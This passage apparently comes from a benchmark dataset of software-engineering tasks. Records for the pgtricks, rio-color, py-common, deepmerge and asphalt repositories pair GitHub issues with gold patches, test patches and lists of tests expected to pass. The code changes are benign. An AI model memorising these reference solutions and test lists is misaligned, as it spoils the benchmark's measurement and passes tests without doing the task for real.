"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.0-one",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.-1.-expect7]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.-one-expect8]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[4.2-0.42-expect9]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[4.2-four",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-.42--0.042-expect11]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-.42-minus",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[\\\\N-\\\\N-expect13]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo-\\\\N-expect14]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[-4.2-\\\\N-expect15]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[--0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[a-b--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[b-a-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-1--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[1-0-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0--1-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-1-0--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-0-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-1--1-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0.42-0.042-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[4.2-42.0--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-.42-.42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[.42--.42-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\"32.0\"-\"4.20\"--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\ta-bar\\tb-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\tb-foo\\ta-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\t0.42-foo\\t4.2--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo\\tbar\\t0.42424242424242\\tbaz-foo\\tbar\\t0.42424242424242\\tbaz-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[foo-0-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[0-foo--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-42--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-42.0-0_0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N-42-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[42-42.0-0_1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[-\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N--1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp[\\\\N-\\\\N-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_linecomp_by_sorting",
"pgtricks/tests/test_pg_dump_splitsort.py::test_split_sql_file",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[0-0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1k-1024]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1m-1048576]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1g-1073741824]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[100_000K-102400000]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5M-1572864]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5G-1610612736]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5-1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[1.5KB-1536]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[.5MB-524288]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_memory_size[20GB-21474836480]"
] |
[] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-07-04 07:59:52+00:00
|
bsd-3-clause
| 987
|
|
mapbox__rio-color-14
|
diff --git a/rio_color/scripts/cli.py b/rio_color/scripts/cli.py
index 7ec9cab..9580f68 100755
--- a/rio_color/scripts/cli.py
+++ b/rio_color/scripts/cli.py
@@ -1,13 +1,27 @@
import click
+
import rasterio
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations
import riomucho
+jobs_opt = click.option(
+ '--jobs', '-j', type=int, default=1,
+ help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1")
+
+
+def check_jobs(jobs):
+ if jobs == 0:
+ raise click.UsageError("Jobs must be >= 1 or == -1")
+ elif jobs < 0:
+ import multiprocessing
+ jobs = multiprocessing.cpu_count()
+ return jobs
+
+
@click.command('color')
-@click.option('--jobs', '-j', type=int, default=1,
- help="Number of jobs to run simultaneously, default: 1")
+@jobs_opt
@click.option('--out-dtype', '-d', type=click.Choice(['uint8', 'uint16']),
help="Integer data type for output data, default: same as input")
@click.argument('src_path', type=click.Path(exists=True))
@@ -73,6 +87,8 @@ Example:
'out_dtype': out_dtype
}
+ jobs = check_jobs(jobs)
+
if jobs > 1:
with riomucho.RioMucho(
[src_path],
@@ -103,8 +119,7 @@ Example:
@click.option('--bias', '-b', type=click.FLOAT, default=15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..100 (50 is none), default: 15.")
-@click.option('--jobs', '-j', type=int, default=1,
- help="Number of jobs to run simultaneously, default: 1")
+@jobs_opt
@click.option('--out-dtype', '-d', type=click.Choice(['uint8', 'uint16']),
help="Integer data type for output data, default: same as input")
@click.argument('src_path', type=click.Path(exists=True))
@@ -132,6 +147,8 @@ def atmos(ctx, atmo, contrast, bias, jobs, out_dtype,
'out_dtype': out_dtype
}
+ jobs = check_jobs(jobs)
+
if jobs > 1:
with riomucho.RioMucho(
[src_path],
|
mapbox/rio-color
|
bb410109f6a0ae376443880f96dc8981766066a3
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index 8448a74..1d30644 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -1,10 +1,12 @@
import os
+from click import UsageError
from click.testing import CliRunner
import numpy as np
+import pytest
import rasterio
-from rio_color.scripts.cli import color, atmos
+from rio_color.scripts.cli import color, atmos, check_jobs
def equal(r1, r2):
@@ -98,3 +100,25 @@ def test_bad_op(tmpdir):
assert result.exit_code == 2
assert "foob is not a valid operation" in result.output
assert not os.path.exists(output)
+
+
+def test_color_jobsn1(tmpdir):
+ output = str(tmpdir.join('colorj1.tif'))
+ runner = CliRunner()
+ result = runner.invoke(
+ color,
+ [
+ '-d', 'uint8',
+ '-j', '-1',
+ 'tests/rgb8.tif',
+ output,
+ "gamma 1,2,3 1.85"])
+ assert result.exit_code == 0
+ assert os.path.exists(output)
+
+
+def test_check_jobs():
+ assert 1 == check_jobs(1)
+ assert check_jobs(-1) > 0
+ with pytest.raises(UsageError):
+ check_jobs(0)
|
use all cores with -j -1
Modify max_procs so that a negative value means "use the number of cores available on this machine"
|
0.0
|
bb410109f6a0ae376443880f96dc8981766066a3
|
[
"tests/test_cli.py::test_check_jobs"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-04-18 20:15:46+00:00
|
mit
| 3,703
|
|
arxanchain__py-common-16
|
diff --git a/README.md b/README.md
index 8221932..40254e2 100644
--- a/README.md
+++ b/README.md
@@ -21,20 +21,50 @@ $ python setup.py install # install py-common
## Usage
-**Note:** Before using the py-common in your operating system, you need to make a two-step preparation:
+**Note:** Before using the py-common in your application, you need to make the following preparations:
-1. Build executables with sdk-go-common cryption tools. To build these tools, you may need to install **golang** package **sdk-go-common**. For more details please refer to [sdk-go-common](https://github.com/arxanchain/sdk-go-common/tree/master/crypto/tools/README.md)
+### 1.Configure your encryption and signing libraries
-2. Copy executables **crypto-util** and **sign-util** into your py-common installation path `cryption/utils`.
+1. Build executables with sdk-go-common encryption tools. To build these executables, you need to install **golang** and download **sdk-go-common**. For more details please refer to [sdk-go-common](https://github.com/arxanchain/sdk-go-common/tree/master/crypto/tools/README.md).
-If you have no idea where your py-common is installed, use the following command to check out.
+2. Copy the executables **crypto-util** and **sign-util** into your py-common installation path `cryption/utils`.
+
+If you have no idea where your py-common is installed, use the following command to check it out (you need to leave the py-common code repo before running this command).
```sh
$ python -c 'import imp;print imp.find_module("cryption")[1]'
/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption
```
-In this case, you should copy executables into path `/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption/utils/`.
+In this case, you should create directory `/usr/local/lib/python2.7/site-packages/py_common-1.5.0-py2.7.egg/cryption/utils/`, and copy the executables into this path.
+
+### 2. Configure you certificates
+
+To communicate with the server, you need to download a TLS certificate, register api-key and download the corresponding private key file from your ArxanChain BaaS Chainconsole. Refer to [API cert management](http://www.arxanfintech.com/infocenter/html/chainconsole/manual.html#api) for more details.
+
+After downloading the two files, use the following command to convert your private key file into PEM format.
+
+```sh
+$ openssl ec -in apikey.key -outform PEM -out apikey.key
+```
+
+Then copy (rename as follows) your TLS certificate and PEM private key file into your py-common installation path as follows. Please pay special attention to the absolute path of your certificate `./py_common-1.5.0-py2.7.egg/cryption/ecc/certs`, which will be used to create a wallet client.
+
+```
+.
+├── py_common-1.5.0-py2.7.egg
+| └── cryption
+| ├── ecc
+| | └── certs
+| | ├── tls
+| | | └── tls.cert
+| | └── users
+| | └── pWEzB4yMM1518346407
+| | └── pWEzB4yMM1518346407.key
+| └── utils
+| ├── sign-util
+| └── crypto-util
+```
### Run unit test
diff --git a/rest/api/api.py b/rest/api/api.py
index 775245b..6bdad9a 100644
--- a/rest/api/api.py
+++ b/rest/api/api.py
@@ -34,12 +34,15 @@ APIKEY = "pWEzB4yMM1518346407"
def set_body(body, apikey, cert_path):
"""Set body encdypted.
- :param body: body dictionary to be encrypted
+ :param body: body dictionary or string to be encrypted
:param apikey: api key generated from server
:param cert_path: path of private key file and cert file
:Returns: crypted cipher text
"""
- return sign_and_encrypt(json.dumps(body), apikey, cert_path)
+ if isinstance(body, dict):
+ body = json.dumps(body)
+
+ return sign_and_encrypt(body, apikey, cert_path)
def set_sign_body(body, secret_key, did, nonce, apikey, cert_path):
"""Set body signed.
@@ -69,7 +72,12 @@ def do_post(url, headers, body, files=None):
:param body: body dictionary
:Returns: response
"""
- return requests.post(url, headers=headers, data=body, files=files)
+ return requests.post(
+ url,
+ headers=headers,
+ data=body,
+ files=files
+ )
def do_put(url, headers, body):
"""Start POST request.
@@ -91,7 +99,9 @@ def require_ok(resp, apikey, cert_path):
"""
client_err_msg = ""
if resp.status_code != STATUS_CODE_OK:
- logging.error("Status code: {}, Client Error, body: {}".format(resp.status_code, resp.text))
+ logging.error("Status code: {}, Client Error, body: {}".format(
+ resp.status_code,
+ resp.text))
if len(resp.text) <= 0:
client_err_msg = "Respond error: Body empty"
@@ -101,11 +111,16 @@ def require_ok(resp, apikey, cert_path):
result = {}
plain_body = ""
try:
- plain_body = decrypt_and_verify(resp.text, apikey, cert_path)
+ plain_body = decrypt_and_verify(
+ resp.text,
+ apikey,
+ cert_path
+ )
result = json.loads(plain_body)
except Exception:
logging.error("cannot decrypt_and_verify response body: {}".format(resp.text))
client_err_msg = resp.text
+
result["ClientErrMsg"] = client_err_msg
return result
@@ -120,18 +135,49 @@ def do_request(req_params, apikey, cert_path, request_func):
:param request_func: request function to be used
:Returns: time duration, response
"""
+
if len(cert_path) <= 0:
cert_path = CERT_PATH
if len(apikey) <= 0:
apikey = APIKEY
beg_time = time.time()
+
if request_func == do_get and "body" in req_params:
del req_params["body"]
else:
- req_body = set_body(req_params["body"], apikey, cert_path)
+ req_body = set_body(
+ req_params["body"],
+ apikey,
+ cert_path
+ )
req_params["body"] = req_body
- resp = require_ok(request_func(**req_params),
+
+ resp = require_ok(
+ request_func(**req_params),
apikey, cert_path)
+
time_dur = time.time() - beg_time
return time_dur, resp
+
+def do_prepare(prepared, apikey, cert_path):
+ """ Do requst with the given request object.
+ And calculate total time used.
+
+ :param requests.PreparedRequest object used to do the request
+ :param apikey: the api key authorized by the server
+ :param cert_path: path of private key file and cert file
+ :Returns: time duration, response
+ """
+ prepared.body = set_body(prepared.body, apikey, cert_path)
+ prepared.headers['Content-Length'] = str(len(prepared.body))
+ beg_time = time.time()
+ resp = require_ok(
+ requests.session().send(prepared),
+ apikey,
+ cert_path
+ )
+ time_dur = time.time() - beg_time
+
+ return time_dur, resp
+
|
arxanchain/py-common
|
963a267c3aa42571f778c7fb5efa29c4f6aa09a3
|
diff --git a/test/test_api.py b/test/test_api.py
index 60eace4..57328fe 100644
--- a/test/test_api.py
+++ b/test/test_api.py
@@ -20,12 +20,13 @@ import json
import sys
import httpretty
import mock
+import requests
ROOTPATH = os.path.join(
os.path.dirname(__file__),
"../"
)
sys.path.append(ROOTPATH)
-from rest.api.api import set_body, set_sign_body, do_get, do_post, do_put, require_ok, do_request
+from rest.api.api import set_body, set_sign_body, do_get, do_post, do_put, require_ok, do_request, do_prepare
class Response(object):
def __init__(self, status_code, text):
@@ -38,6 +39,7 @@ class ApiTest(unittest.TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.header = {}
+ self.url = "http://127.0.0.1"
self.status_not_found = 404
self.resp_not_found = "404 Not Found"
self.nonce = "nonce"
@@ -152,4 +154,53 @@ class ApiTest(unittest.TestCase):
)
self.assertEqual(self.resp_not_found, result["ClientErrMsg"])
-
+
+ def test_do_prepare_succ(self):
+ mock_send = mock.Mock(return_value=Response(self.status_ok, json.dumps(self.resp)))
+ mock_run_cmd = mock.Mock(side_effect=[self.cipher, json.dumps(self.resp)])
+ request_func = do_post
+ with mock.patch('cryption.crypto.run_cmd', mock_run_cmd):
+ with mock.patch('requests.Session.send', mock_send):
+ poeid_filepart = (
+ "",
+ "poe id",
+ )
+ files = {"poe_id": poeid_filepart}
+
+ _, result = do_prepare(
+ requests.Request(
+ "POST",
+ url=self.url,
+ files=files
+ ).prepare(),
+ self.apikey,
+ self.cert_path
+ )
+
+ self.assertEqual(0, result["ErrCode"])
+
+ def test_do_prepare_fail(self):
+ mock_send = mock.Mock(return_value=Response(self.status_not_found, self.resp_not_found))
+ mock_run_cmd = mock.Mock(side_effect=[self.cipher, {}])
+ with mock.patch('cryption.crypto.run_cmd', mock_run_cmd):
+ with mock.patch('requests.Session.send', mock_send):
+ poeid_filepart = (
+ "",
+ "poe id",
+ )
+ files = {
+ "poe_id": poeid_filepart,
+ }
+
+ _, result = do_prepare(
+ requests.Request(
+ "POST",
+ url=self.url,
+ files=files
+ ).prepare(),
+ self.apikey,
+ self.cert_path
+ )
+
+ self.assertEqual(self.resp_not_found, result["ClientErrMsg"])
+
|
README add certs tree description
```
| └── certs
| ├── tls
| | └── tls.cert
| └── users
| └── pWEzB4yMM1518346407
| └── pWEzB4yMM1518346407.key
```
|
0.0
|
963a267c3aa42571f778c7fb5efa29c4f6aa09a3
|
[
"test/test_api.py::ApiTest::test_do_prepare_fail",
"test/test_api.py::ApiTest::test_do_prepare_succ"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-03-13 09:02:29+00:00
|
apache-2.0
| 1,101
|
|
toumorokoshi__deepmerge-22
|
diff --git a/Makefile b/Makefile
index 9a611ee..75ba49c 100644
--- a/Makefile
+++ b/Makefile
@@ -11,7 +11,7 @@ build: .venv/deps
# only works with python 3+
lint: .venv/deps
- .venv/bin/python -m pip install black==21.12b0
+ .venv/bin/python -m pip install black==22.3.0
.venv/bin/python -m black --check .
test: .venv/deps
diff --git a/deepmerge/extended_set.py b/deepmerge/extended_set.py
new file mode 100644
index 0000000..1d51b43
--- /dev/null
+++ b/deepmerge/extended_set.py
@@ -0,0 +1,25 @@
+class ExtendedSet(set):
+ """
+ ExtendedSet is an extension of set, which allows for usage
+ of types that are typically not allowed in a set
+ (e.g. unhashable).
+
+ The following types that cannot be used in a set are supported:
+
+ - unhashable types
+ """
+
+ def __init__(self, elements):
+ self._values_by_hash = {self._hash(e): e for e in elements}
+
+ def _insert(self, element):
+ self._values_by_hash[self._hash(element)] = element
+
+ def _hash(self, element):
+ if getattr(element, "__hash__") is not None:
+ return hash(element)
+ else:
+ return hash(str(element))
+
+ def __contains__(self, obj):
+ return self._hash(obj) in self._values_by_hash
diff --git a/deepmerge/strategy/list.py b/deepmerge/strategy/list.py
index ca42828..2e42519 100644
--- a/deepmerge/strategy/list.py
+++ b/deepmerge/strategy/list.py
@@ -1,4 +1,5 @@
from .core import StrategyList
+from ..extended_set import ExtendedSet
class ListStrategies(StrategyList):
@@ -26,5 +27,5 @@ class ListStrategies(StrategyList):
@staticmethod
def strategy_append_unique(config, path, base, nxt):
"""append items without duplicates in nxt to base."""
- base_as_set = set(base)
+ base_as_set = ExtendedSet(base)
return base + [n for n in nxt if n not in base_as_set]
diff --git a/docs/conf.py b/docs/conf.py
index ee1edbc..df0dc4d 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -52,18 +52,18 @@ source_suffix = ".rst"
master_doc = "index"
# General information about the project.
-project = u"deepmerge"
-copyright = u"2016, Yusuke Tsutsumi"
-author = u"Yusuke Tsutsumi"
+project = "deepmerge"
+copyright = "2016, Yusuke Tsutsumi"
+author = "Yusuke Tsutsumi"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
-version = u"0.1"
+version = "0.1"
# The full version, including alpha/beta/rc tags.
-release = u"0.1"
+release = "0.1"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
@@ -271,8 +271,8 @@ latex_documents = [
(
master_doc,
"deepmerge.tex",
- u"deepmerge Documentation",
- u"Yusuke Tsutsumi",
+ "deepmerge Documentation",
+ "Yusuke Tsutsumi",
"manual",
),
]
@@ -308,7 +308,7 @@ latex_documents = [
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
-man_pages = [(master_doc, "deepmerge", u"deepmerge Documentation", [author], 1)]
+man_pages = [(master_doc, "deepmerge", "deepmerge Documentation", [author], 1)]
# If true, show URL addresses after external links.
#
@@ -324,7 +324,7 @@ texinfo_documents = [
(
master_doc,
"deepmerge",
- u"deepmerge Documentation",
+ "deepmerge Documentation",
author,
"deepmerge",
"One line description of project.",
diff --git a/docs/guide.rst b/docs/guide.rst
index 39f414a..a13bb01 100644
--- a/docs/guide.rst
+++ b/docs/guide.rst
@@ -10,7 +10,7 @@ it's recommended to choose your own strategies, deepmerge does
provided some preconfigured mergers for a common situations:
* deepmerge.always_merger: always try to merge. in the case of mismatches, the value from the second object overrides the first o ne.
-* deepmerge.merge_or_raise: try to merge, raise an exception if an unmergable situation is encountered.
+* deepmerge.merge_or_raise: try to merge, raise an exception if an unmergable situation is encountered.
* deepmerge.conservative_merger: similar to always_merger, but in the case of a conflict, use the existing value.
Once a merger is constructed, it then has a merge() method that can be called:
@@ -33,7 +33,6 @@ Once a merger is constructed, it then has a merge() method that can be called:
Merges are Destructive
======================
-
You may have noticed from the example, but merging is a destructive behavior: it will modify the first argument passed in (the base) as part of the merge.
This is intentional, as an implicit copy would result in a significant performance slowdown for deep data structures. If you need to keep the original objects unmodified, you can use the deepcopy method:
@@ -96,3 +95,13 @@ Example:
If a strategy fails, an exception should not be raised. This is to
ensure it can be chained with other strategies, or the fall-back.
+Uniqueness of elements when merging
+===================================
+
+Some strategies require determining the uniqueness
+of the elements. Since deepmerge primarily deals with nested
+types, this includes structures that are not hashable such as
+dictionaries.
+
+In those cases, built-in deepmerge strategies will call repr()
+on the object and hash that value instead.
\ No newline at end of file
|
toumorokoshi/deepmerge
|
4ac5ff666d06cb072ff200ff4255d86d950b71a4
|
diff --git a/deepmerge/tests/strategy/test_list.py b/deepmerge/tests/strategy/test_list.py
index 39215a9..7eb2d3b 100644
--- a/deepmerge/tests/strategy/test_list.py
+++ b/deepmerge/tests/strategy/test_list.py
@@ -19,3 +19,15 @@ def test_strategy_append_unique(custom_merger):
expected = [1, 3, 2, 5, 4]
actual = custom_merger.merge(base, nxt)
assert actual == expected
+
+
+def test_strategy_append_unique_nested_dict(custom_merger):
+ """append_unique should work even with unhashable objects
+ Like dicts.
+ """
+ base = [{"bar": ["bob"]}]
+ nxt = [{"bar": ["baz"]}]
+
+ result = custom_merger.merge(base, nxt)
+
+ assert result == [{"bar": ["bob"]}, {"bar": ["baz"]}]
|
list merge strategy append_unique does not work for lists of dicts
Hi developers, especially @morph027 ,
I get an error when trying to apply list merge strategy `append_unique` for lists of dictionaries.
I am using deepmerge 1.0.1 and python 3.7.7.
When I am running the following code
```python
from deepmerge import Merger
my_merger = Merger(
# pass in a list of tuple, with the
# strategies you are looking to apply
# to each type.
[
(list, ["append_unique"]),
(dict, ["merge"]),
(set, ["union"])
],
# next, choose the fallback strategies,
# applied to all other types:
["override"],
# finally, choose the strategies in
# the case where the types conflict:
["override"]
)
base = {"foo": ["bar"]}
next = {"foo": ["bar","baz"]}
result = my_merger.merge(base, next)
assert result == {'foo': ['bar', 'baz']}
base = {"foo": [{"bar": ["bob"]}]}
next = {"foo": [{"bar": ["baz"]}]}
result = my_merger.merge(base, next)
assert result == {'foo': [{'bar', ["bob"]}, {"bar": ["baz"]}]}
```
I get the following exception
```bash
python3 test_merge.py
Traceback (most recent call last):
File "test_merge.py", line 29, in <module>
result = my_merger.merge(base, next)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 33, in merge
return self.value_strategy([], base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 43, in value_strategy
return strategy(self, path, base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/core.py", line 35, in __call__
ret_val = s(*args, **kwargs)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/dict.py", line 23, in strategy_merge
base[k] = config.value_strategy(path + [k], base[k], v)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/merger.py", line 43, in value_strategy
return strategy(self, path, base, nxt)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/core.py", line 35, in __call__
ret_val = s(*args, **kwargs)
File "/home/horst/venv/lib64/python3.7/site-packages/deepmerge/strategy/list.py", line 29, in strategy_append_unique
base_as_set = set(base)
TypeError: unhashable type: 'dict'
```
Best,
Oliver
|
0.0
|
4ac5ff666d06cb072ff200ff4255d86d950b71a4
|
[
"deepmerge/tests/strategy/test_list.py::test_strategy_append_unique_nested_dict"
] |
[
"deepmerge/tests/strategy/test_list.py::test_strategy_append_unique"
] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-21 06:00:20+00:00
|
mit
| 6,067
|
|
asphalt-framework__asphalt-50
|
diff --git a/docs/userguide/deployment.rst b/docs/userguide/deployment.rst
index 6736615..7f9fd45 100644
--- a/docs/userguide/deployment.rst
+++ b/docs/userguide/deployment.rst
@@ -17,17 +17,18 @@ Running the launcher is very straightfoward:
.. code-block:: bash
- asphalt run yourconfig.yaml [your-overrides.yml...]
+ asphalt run yourconfig.yaml [your-overrides.yml...] [--set path.to.key=val]
Or alternatively:
- python -m asphalt run yourconfig.yaml [your-overrides.yml...]
+ python -m asphalt run yourconfig.yaml [your-overrides.yml...] [--set path.to.key=val]
What this will do is:
#. read all the given configuration files, starting from ``yourconfig.yaml``
-#. merge the configuration files' contents into a single configuration dictionary using
- :func:`~asphalt.core.utils.merge_config`
+#. read the command line configuration options passed with ``--set``, if any
+#. merge the configuration files' contents and the command line configuration options into a single configuration dictionary using
+ :func:`~asphalt.core.utils.merge_config`.
#. call :func:`~asphalt.core.runner.run_application` using the configuration dictionary as keyword
arguments
@@ -147,8 +148,10 @@ Component configuration can be specified on several levels:
* First configuration file argument to ``asphalt run``
* Second configuration file argument to ``asphalt run``
* ...
+* Command line configuration options to ``asphalt run --set``
Any options you specify on each level override or augment any options given on previous levels.
+The command line configuration options have precedence over the configuration files.
To minimize the effort required to build a working configuration file for your application, it is
suggested that you pass as many of the options directly in the component initialization code and
leave only deployment specific options like API keys, access credentials and such to the
@@ -162,12 +165,29 @@ gets passed three keyword arguments:
* ``ssl=True``
The first one is provided in the root component code while the other two options come from the YAML
-file. You could also override the mailer backend in the configuration file if you wanted. The same
-effect can be achieved programmatically by supplying the override configuration to the container
-component via its ``components`` constructor argument. This is very useful when writing tests
-against your application. For example, you might want to use the ``mock`` mailer in your test suite
-configuration to test that the application correctly sends out emails (and to prevent them from
-actually being sent to recipients!).
+file. You could also override the mailer backend in the configuration file if you wanted, or at the
+command line (with the configuration file saved as ``config.yaml``):
+
+.. code-block:: bash
+
+ asphalt run config.yaml --set component.components.mailer.backend=sendmail
+
+.. note::
+ Note that if you want a ``.`` to be treated as part of an identifier, and not as a separator,
+ you need to escape it at the command line with ``\``. For instance, in both commands:
+
+ .. code-block:: bash
+
+ asphalt run config.yaml --set "logging.loggers.asphalt\.templating.level=DEBUG"
+ asphalt run config.yaml --set logging.loggers.asphalt\\.templating.level=DEBUG
+
+ The logging level for the ``asphalt.templating`` logger will be set to ``DEBUG``.
+
+The same effect can be achieved programmatically by supplying the override configuration to the
+container component via its ``components`` constructor argument. This is very useful when writing
+tests against your application. For example, you might want to use the ``mock`` mailer in your test
+suite configuration to test that the application correctly sends out emails (and to prevent them
+from actually being sent to recipients!).
There is another neat trick that lets you easily modify a specific key in the configuration.
By using dotted notation in a configuration key, you can target a specific key arbitrarily deep in
diff --git a/src/asphalt/core/cli.py b/src/asphalt/core/cli.py
index 3f4c02d..b1823e5 100644
--- a/src/asphalt/core/cli.py
+++ b/src/asphalt/core/cli.py
@@ -1,8 +1,10 @@
from __future__ import annotations
import os
+import re
+from collections.abc import Mapping
from pathlib import Path
-from typing import Any, Dict, Optional
+from typing import Any, Dict, List, Optional
import click
from ruamel.yaml import YAML, ScalarNode
@@ -52,7 +54,20 @@ def main() -> None:
type=str,
help="service to run (if the configuration file contains multiple services)",
)
-def run(configfile, unsafe: bool, loop: Optional[str], service: Optional[str]) -> None:
+@click.option(
+ "--set",
+ "set_",
+ multiple=True,
+ type=str,
+ help="set configuration",
+)
+def run(
+ configfile,
+ unsafe: bool,
+ loop: Optional[str],
+ service: Optional[str],
+ set_: List[str],
+) -> None:
yaml = YAML(typ="unsafe" if unsafe else "safe")
yaml.constructor.add_constructor("!Env", env_constructor)
yaml.constructor.add_constructor("!TextFile", text_file_constructor)
@@ -67,6 +82,28 @@ def run(configfile, unsafe: bool, loop: Optional[str], service: Optional[str]) -
), "the document root element must be a dictionary"
config = merge_config(config, config_data)
+ # Override config options
+ for override in set_:
+ if "=" not in override:
+ raise click.ClickException(
+ f"Configuration must be set with '=', got: {override}"
+ )
+
+ key, value = override.split("=", 1)
+ parsed_value = yaml.load(value)
+ keys = [k.replace(r"\.", ".") for k in re.split(r"(?<!\\)\.", key)]
+ section = config
+ for i, part_key in enumerate(keys[:-1]):
+ section = section.setdefault(part_key, {})
+ if not isinstance(section, Mapping):
+ path = " ⟶ ".join(x for x in keys[: i + 1])
+ raise click.ClickException(
+ f"Cannot apply override for {key!r}: value at {path} is not "
+ f"a mapping, but {qualified_name(section)}"
+ )
+
+ section[keys[-1]] = parsed_value
+
# Override the event loop policy if specified
if loop:
config["event_loop_policy"] = loop
|
asphalt-framework/asphalt
|
39ff21a7aa0785f7cdb28eebabd011277080f108
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index c8c22f6..02247a9 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -88,6 +88,38 @@ logging:
}
+def test_run_bad_override(runner: CliRunner) -> None:
+ config = """\
+ component:
+ type: does.not.exist:Component
+"""
+ with runner.isolated_filesystem():
+ Path("test.yml").write_text(config)
+ result = runner.invoke(cli.run, ["test.yml", "--set", "foobar"])
+ assert result.exit_code == 1
+ assert result.stdout == (
+ "Error: Configuration must be set with '=', got: foobar\n"
+ )
+
+
+def test_run_bad_path(runner: CliRunner) -> None:
+ config = """\
+ component:
+ type: does.not.exist:Component
+ listvalue: []
+"""
+ with runner.isolated_filesystem():
+ Path("test.yml").write_text(config)
+ result = runner.invoke(
+ cli.run, ["test.yml", "--set", "component.listvalue.foo=1"]
+ )
+ assert result.exit_code == 1
+ assert result.stdout == (
+ "Error: Cannot apply override for 'component.listvalue.foo': value at "
+ "component ⟶ listvalue is not a mapping, but list\n"
+ )
+
+
def test_run_multiple_configs(runner: CliRunner) -> None:
component_class = "{0.__module__}:{0.__name__}".format(DummyComponent)
config1 = """\
@@ -106,6 +138,7 @@ logging:
component:
dummyval1: alternate
dummyval2: 10
+ dummyval3: foo
"""
with runner.isolated_filesystem(), patch(
@@ -113,7 +146,17 @@ component:
